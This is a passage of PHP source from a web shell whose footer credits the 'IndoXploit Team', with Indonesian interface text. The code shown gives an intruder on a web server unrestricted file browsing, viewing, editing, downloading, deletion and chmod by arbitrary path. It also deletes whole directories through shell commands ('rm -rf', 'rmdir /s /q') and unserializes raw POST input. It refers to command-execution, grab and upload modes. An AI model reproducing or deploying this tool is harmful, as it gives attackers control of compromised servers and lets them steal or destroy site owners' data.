seconds </div>'; if(!empty($files)) { echo '<div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th width="5%">#</th> <th width="60%">File Path</th> <th width="15%">Size</th> <th width="20%">Actions</th> </tr> </thead> <tbody>'; $counter = 1; foreach ($files as $file) { if($counter > 100) { // Limit display to 100 files echo '<tr><td colspan="4" class="text-center text-warning"> ... and '.(count($files) - 100).' more files </td></tr>'; break; } $size = formatSize($file); $dir_path = dirname($file); echo '<tr> <td>'.$counter.'</td> <td> <i class="bi bi-file-earmark-text me-2 text-info"></i> '.$file.' </td> <td><span class="badge bg-secondary">'.$size.'</span></td> <td> <div class="btn-group btn-group-sm"> <a href="?act=view&dir='.urlencode($dir_path).'&file='.urlencode($file).'" class="btn btn-outline-info" title="View"> <i class="bi bi-eye"></i> </a> <a href="?dir='.urlencode($dir_path).'" class="btn btn-outline-warning" title="Open Directory"> <i class="bi bi-folder2-open"></i> </a> </div> </td> </tr>'; $counter++; } echo '</tbody></table></div>'; // Export options echo '<div class="mt-3"> <h6><i class="bi bi-download me-2"></i>Export Results:</h6> <form method="post" class="d-inline"> <input type="hidden" name="export_files" value="'.htmlspecialchars(serialize($files)).'"> <button type="submit" name="export_txt" class="btn btn-sm btn-outline-success"> <i class="bi bi-file-text me-1"></i>Export as TXT </button> </form> </div>'; } } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot read directory: '.$scan_dir.' 
</div>'; } } // Handle export if(isset($_POST['export_txt'])) { $files = unserialize($_POST['export_files']); $export_content = "Recursive Scan Results\n"; $export_content .= "Date: ".date('Y-m-d H:i:s')."\n"; $export_content .= "Directory: ".$_POST['scan_dir']."\n"; $export_content .= "Files Found: ".count($files)."\n\n"; foreach ($files as $index => $file) { $export_content .= ($index+1).". ".$file."\n"; } header('Content-Type: text/plain'); header('Content-Disposition: attachment; filename="scan_results_'.date('Ymd_His').'.txt"'); echo $export_content; exit; } echo '</div></div>'; } // ========== FILE MANAGER DAN OPERASI FILE LAINNYA ========== // Current Directory Navigation (untuk semua halaman kecuali yang sudah di-handle) elseif(!in_array($_GET['do'] ?? '', ['home', 'fileops', 'jumping', 'grab', 'scan', 'archive', 'system', 'upload', 'cmd'])) { // Handle file operations dari kode asli if (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'download') { $file = basename($_GET['file']); $filePath = __DIR__ . '/' . $file; if (file_exists($filePath)) { ob_end_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($filePath) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . 
filesize($filePath)); readfile($filePath); exit; } else { die("<div class='alert alert-danger'>Error: File tidak ditemukan!</div>"); } } elseif(isset($_GET['act']) && $_GET['act'] == 'newfile') { if(isset($_POST['new_save_file'])) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo $act; } echo ' <div class="container mt-4"> <h4 class="mb-3">Buat File Baru</h4> <form method="post"> <div class="input-group mb-3"> <span class="input-group-text"><i class="bi bi-file-earmark-plus"></i></span> <input type="text" name="newfile" value="newfile.php" class="form-control" placeholder="Nama file..." required> <button type="submit" name="new_save_file" class="btn btn-success"><i class="bi bi-plus-lg"></i> Buat File</button> </div> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'newfolder') { if(isset($_POST['new_save_folder'])) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "<font color=red>permission denied</font>"; } else { $act = "<script>window.location='?dir=".$dir."';</script>"; } echo $act; } echo ' <div class="container mt-4"> <h4 class="mb-3">Buat Folder Baru</h4> <form method="post"> <div class="input-group mb-3"> <span class="input-group-text"><i class="bi bi-folder-plus"></i></span> <input type="text" name="newfolder" class="form-control" placeholder="Nama Folder Baru" required> <button type="submit" class="btn btn-primary" name="new_save_folder"> <i class="bi bi-plus-lg"></i> Buat Folder </button> </div> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename_dir') { if(isset($_POST['dir_rename'])) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = "<script>window.location='?dir=".dirname($dir)."';</script>"; } 
else { $act = "<font color=red>permission denied</font>"; } echo "".$act."<br>"; } echo ' <div class="container mt-4"> <h4 class="mb-3">Ubah Nama Folder</h4> <form method="post"> <div class="input-group mb-3"> <span class="input-group-text"><i class="bi bi-folder"></i></span> <input type="text" value="' . basename($dir) . '" class="form-control" readonly> <input type="text" name="fol_rename" class="form-control" placeholder="Nama Baru" required> <button type="submit" class="btn btn-primary" name="dir_rename"> <i class="bi bi-pencil-square"></i> Ubah Nama </button> </div> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'delete_dir') { if(is_dir($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $act = "<script>window.location='?dir=".dirname($dir)."';</script>"; } else { $act = "<font color=red>could not remove ".basename($dir)."</font>"; } } echo $act; } elseif(isset($_GET['act']) && $_GET['act'] == 'view') { echo '<div class="container mt-4"> <h4 class="mb-3">File: <span class="text-success">' . htmlspecialchars(basename($_GET['file'])) . '</span></h4> <div class="btn-group mb-3" role="group"> <a href="?act=view&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-primary btn-sm"><i class="bi bi-eye"></i> View</a> <a href="?act=edit&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-warning btn-sm"><i class="bi bi-pencil-square"></i> Edit</a> <a href="?act=rename&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-info btn-sm"><i class="bi bi-pencil"></i> Rename</a> <a href="?act=download&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-success btn-sm"><i class="bi bi-download"></i> Download</a> <a href="?act=delete&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-danger btn-sm"><i class="bi bi-trash"></i> Delete</a> </div> <textarea class="form-control" rows="10" readonly>' . 
htmlspecialchars(@file_get_contents($_GET['file'])) . '</textarea> </div>'; } elseif (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'chmod_file') { $file = $_GET['file']; $dir = $_GET['dir'] ?? dirname($file); $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Ambil permission saat ini dalam format oktal if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { // Validasi izin harus dalam format oktal 3 digit $chmod_result = chmod($file, octdec($new_perm)); $msg = $chmod_result ? "<span class='text-success'>✅ Permission berhasil diubah menjadi $new_perm!</span>" : "<span class='text-danger'>❌ Gagal mengubah permission!</span>"; $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Update permission setelah chmod } else { $msg = "<span class='text-danger'>❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755).</span>"; } } echo '<div class="container mt-4">'; echo '<h3>🛠 Ganti Permission (chmod) File</h3>'; echo isset($msg) ? "<p>$msg</p>" : ""; echo '<p>📂 <strong>File:</strong> ' . htmlspecialchars($file) . '</p>'; echo '<p>📍 <strong>Path:</strong> ' . htmlspecialchars($dir) . '</p>'; echo '<p>🔑 <strong>Permission Saat Ini:</strong> <code>' . $current_perm . '</code></p>'; echo '<form method="POST">'; echo '<label for="new_perm">🔄 Ubah Permission:</label>'; echo '<input type="text" name="new_perm" id="new_perm" class="form-control mb-2" placeholder="755" required>'; echo '<button type="submit" class="btn btn-primary">✅ Ubah Permission</button>'; echo '</form>'; echo '<br><a href="?dir=' . urlencode($dir) . 
'" class="btn btn-secondary">🔙 Kembali</a>'; echo '</div>'; } elseif (isset($_GET['dir']) && !empty($_GET['dir']) && isset($_GET['act']) && $_GET['act'] == 'chmod_dir') { $dir = $_GET['dir']; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { $chmod_result = chmod($dir, octdec($new_perm)); $msg = $chmod_result ? "<span class='text-success'>✅ Permission berhasil diubah menjadi $new_perm!</span>" : "<span class='text-danger'>❌ Gagal mengubah permission!</span>"; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); } else { $msg = "<span class='text-danger'>❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755).</span>"; } } echo '<div class="container mt-4">'; echo '<h3>🛠 Ganti Permission (chmod) Direktori</h3>'; echo isset($msg) ? "<p>$msg</p>" : ""; echo '<p>📂 <strong>Direktori:</strong> ' . htmlspecialchars($dir) . '</p>'; echo '<p>🔑 <strong>Permission Saat Ini:</strong> <code>' . $current_perm . '</code></p>'; echo '<form method="POST">'; echo '<label for="new_perm">🔄 Ubah Permission:</label>'; echo '<input type="text" name="new_perm" id="new_perm" class="form-control mb-2" placeholder="755" required>'; echo '<button type="submit" class="btn btn-primary">✅ Ubah Permission</button>'; echo '</form>'; echo '<br><a href="?dir=' . urlencode($dir) . '" class="btn btn-secondary">🔙 Kembali</a>'; echo '</div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'edit') { if (isset($_POST['save'])) { $save = file_put_contents($_GET['file'], $_POST['src']); if ($save) { $act = '<div class="alert alert-success" role="alert">✅ File berhasil disimpan!</div>'; } else { $act = '<div class="alert alert-danger" role="alert">❌ Permission Denied!</div>'; } echo $act; } echo '<div class="container mt-4"> <h4 class="mb-3">File: <span class="text-success">' . htmlspecialchars(basename($_GET['file'])) . 
'</span></h4> <div class="btn-group mb-3" role="group"> <a href="?act=view&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-primary btn-sm"><i class="bi bi-eye"></i> View</a> <a href="?act=edit&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-warning btn-sm"><i class="bi bi-pencil-square"></i> Edit</a> <a href="?act=rename&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-info btn-sm"><i class="bi bi-pencil"></i> Rename</a> <a href="?act=download&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-success btn-sm"><i class="bi bi-download"></i> Download</a> <a href="?act=delete&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-danger btn-sm"><i class="bi bi-trash"></i> Delete</a> </div> <form method="post"> <div class="mb-3"> <textarea name="src" class="form-control" rows="10">' . htmlspecialchars(@file_get_contents($_GET['file'])) . '</textarea> </div> <button type="submit" name="save" class="btn btn-primary w-100"><i class="bi bi-save"></i> Save</button> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename') { if (isset($_POST['do_rename'])) { $new_name = htmlspecialchars($_POST['rename']); $rename = rename($_GET['file'], "$dir/$new_name"); if ($rename) { echo "<script>window.location='?dir=" . urlencode($dir) . "';</script>"; exit; } else { echo '<div class="alert alert-danger" role="alert">❌ Permission Denied!</div>'; } } echo '<div class="container mt-4"> <h4 class="mb-3">Rename File</h4> <div class="btn-group mb-3" role="group"> <a href="?act=view&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-primary btn-sm"><i class="bi bi-eye"></i> View</a> <a href="?act=edit&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-warning btn-sm"><i class="bi bi-pencil-square"></i> Edit</a> <a href="?act=rename&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . 
'" class="btn btn-outline-info btn-sm"><i class="bi bi-pencil"></i> Rename</a> <a href="?act=download&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-success btn-sm"><i class="bi bi-download"></i> Download</a> <a href="?act=delete&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-danger btn-sm"><i class="bi bi-trash"></i> Delete</a> </div> <form method="post" class="mb-3"> <div class="mb-3"> <label for="rename" class="form-label">New File Name:</label> <input type="text" name="rename" id="rename" value="' . htmlspecialchars(basename($_GET['file'])) . '" class="form-control" required> </div> <button type="submit" name="do_rename" class="btn btn-primary w-100"><i class="bi bi-arrow-right-circle"></i> Rename</button> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = "<script>window.location='?dir=".$dir."';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo $act; } // File Manager (Default View) else { // Current Directory Navigation echo '<div class="card mb-4"> <div class="card-body"> <nav aria-label="breadcrumb"> <ol class="breadcrumb mb-3">'; if (PHP_OS_FAMILY === "Windows") { echo '<li class="breadcrumb-item"><strong>Drives:</strong></li>'; foreach (range('A', 'Z') as $drive) { if (is_dir($drive . ':\\')) { echo '<li class="breadcrumb-item"> <a href="?dir='.$drive.':/" class="btn btn-sm btn-outline-info me-1"> <i class="bi bi-hdd"></i> '.$drive.' 
</a> </li>'; } } } echo '<li class="breadcrumb-item"><strong>Path:</strong></li>'; foreach ($scdir as $c_dir => $cdir) { echo '<li class="breadcrumb-item"> <a href="?dir='; for ($i = 0; $i <= $c_dir; $i++) { echo $scdir[$i]; if ($i != $c_dir) { echo "/"; } } echo '">'.$cdir.'</a> </li>'; } echo '</ol></nav>'; echo '<div class="d-flex gap-2"> <a href="?act=newfile&dir='.$dir.'" class="btn btn-success btn-sm"> <i class="bi bi-file-earmark-plus"></i> New File </a> <a href="?act=newfolder&dir='.$dir.'" class="btn btn-primary btn-sm"> <i class="bi bi-folder-plus"></i> New Folder </a> <span class="ms-auto">'.w($dir, perms($dir)).'</span> </div> </div> </div>'; echo '<div class="card mb-4"> <div class="card-header bg-dark d-flex justify-content-between align-items-center"> <h5 class="mb-0"><i class="bi bi-files me-2"></i>File Manager</h5> <span class="badge bg-secondary">'.count(glob("$dir/*")).' items</span> </div> <div class="card-body p-0"> <div class="table-responsive">'; if(is_dir($dir) && is_readable($dir)) { echo '<table class="table table-dark table-hover mb-0"> <thead class="table-secondary"> <tr> <th width="40%">Name</th> <th>Size</th> <th>Modified</th> <th>Permissions</th> <th>Actions</th> </tr> </thead> <tbody>'; // Parent directory link if($dir != "/") { $parent = dirname($dir); echo '<tr> <td colspan="5"> <a href="?dir='.$parent.'" class="text-decoration-none text-info"> <i class="bi bi-arrow-up-circle me-2"></i>Parent Directory </a> </td> </tr>'; } $scandir = scandir($dir); $folders = []; $files = []; foreach($scandir as $item) { if($item == '.' || $item == '..') continue; if(is_dir("$dir/$item")) { $folders[] = $item; } else { $files[] = $item; } } // Display folders first foreach($folders as $folder) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$folder")); echo '<tr> <td> <i class="bi bi-folder-fill folder-icon me-2"></i> <a href="?dir='.$dir.'/'.$folder.'" class="text-decoration-none text-warning fw-bold"> '.$folder.' 
</a> </td> <td><span class="badge bg-secondary">DIR</span></td> <td>'.$ftime.'</td> <td> <a href="?act=chmod_dir&dir='.$dir.'/'.$folder.'" class="text-decoration-none"> '.w("$dir/$folder", perms("$dir/$folder")).' </a> </td> <td> <div class="btn-group btn-group-sm"> <a href="?act=rename_dir&dir='.$dir.'/'.$folder.'" class="btn btn-outline-warning" title="Rename"> <i class="bi bi-pencil"></i> </a> <a href="?act=delete_dir&dir='.$dir.'/'.$folder.'" class="btn btn-outline-danger" onclick="return confirm(\'Delete folder '.$folder.'?\')" title="Delete"> <i class="bi bi-trash"></i> </a> </div> </td> </tr>'; } // Display files foreach($files as $file) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$file")); $size = formatSize("$dir/$file"); $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); // Set icon based on file extension $icon = 'bi-file-earmark'; $color = 'text-info'; if(in_array($ext, ['php', 'html', 'htm', 'js', 'css'])) { $icon = 'bi-file-code'; $color = 'text-success'; } elseif(in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'bmp'])) { $icon = 'bi-file-image'; $color = 'text-warning'; } elseif(in_array($ext, ['zip', 'rar', 'tar', 'gz'])) { $icon = 'bi-file-zip'; $color = 'text-danger'; } echo '<tr> <td> <i class="bi '.$icon.' '.$color.' me-2"></i> <a href="?act=view&dir='.$dir.'&file='.$dir.'/'.$file.'" class="text-decoration-none text-light"> '.$file.' </a> </td> <td><span class="badge bg-secondary">'.$size.'</span></td> <td>'.$ftime.'</td> <td> <a href="?act=chmod_file&dir='.$dir.'&file='.$dir.'/'.$file.'" class="text-decoration-none"> '.w("$dir/$file", perms("$dir/$file")).' 
</a> </td> <td> <div class="btn-group btn-group-sm"> <a href="?act=view&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-info" title="View"> <i class="bi bi-eye"></i> </a> <a href="?act=edit&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-warning" title="Edit"> <i class="bi bi-pencil-square"></i> </a> <a href="?act=download&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-success" title="Download"> <i class="bi bi-download"></i> </a> <a href="?act=delete&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-danger" onclick="return confirm(\'Delete file '.$file.'?\')" title="Delete"> <i class="bi bi-trash"></i> </a> </div> </td> </tr>'; } echo '</tbody></table>'; } else { echo '<div class="alert alert-danger m-3"> <i class="bi bi-exclamation-triangle me-2"></i> Cannot open directory. (Not readable) </div>'; } echo '</div></div></div>'; } } // Logout Handler if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo "<script>window.location='?';</script>"; } // Footer echo '<footer class="mt-4 pt-3 border-top border-secondary text-center text-muted"> <div class="row"> <div class="col-md-6"> <p class="mb-1"> <i class="bi bi-shield-fill-check me-1"></i> Session: <span class="text-info">'.session_id().'</span> </p> </div> <div class="col-md-6"> <p class="mb-1"> <i class="bi bi-heart-fill text-danger me-1"></i> Powered by: <span class="text-warning">IndoXploit Team</span> </p> </div> </div> <p class="mt-2 small"> © '.date("Y").' 
- All rights reserved </p> </footer>'; echo '</div>'; // Close container ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> <script> // Auto-focus on command input document.addEventListener('DOMContentLoaded', function() { const cmdInput = document.querySelector('input[name="cmd"]'); if(cmdInput) cmdInput.focus(); // Confirm delete actions const deleteLinks = document.querySelectorAll('a[onclick*="confirm"]'); deleteLinks.forEach(link => { link.addEventListener('click', function(e) { if(!confirm('Are you sure you want to delete this?')) { e.preventDefault(); } }); }); // Initialize tooltips var tooltipTriggerList = [].slice.call(document.querySelectorAll('[data-bs-toggle="tooltip"]')); var tooltipList = tooltipTriggerList.map(function (tooltipTriggerEl) { return new bootstrap.Tooltip(tooltipTriggerEl); }); }); </script> </body> </html>